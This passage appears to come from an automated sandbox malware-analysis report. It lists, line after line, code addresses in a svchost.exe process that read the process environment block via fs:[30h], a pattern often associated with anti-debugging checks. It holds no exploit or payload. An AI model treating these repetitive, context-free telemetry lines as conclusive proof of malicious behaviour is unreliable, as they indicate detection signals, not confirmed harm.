            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
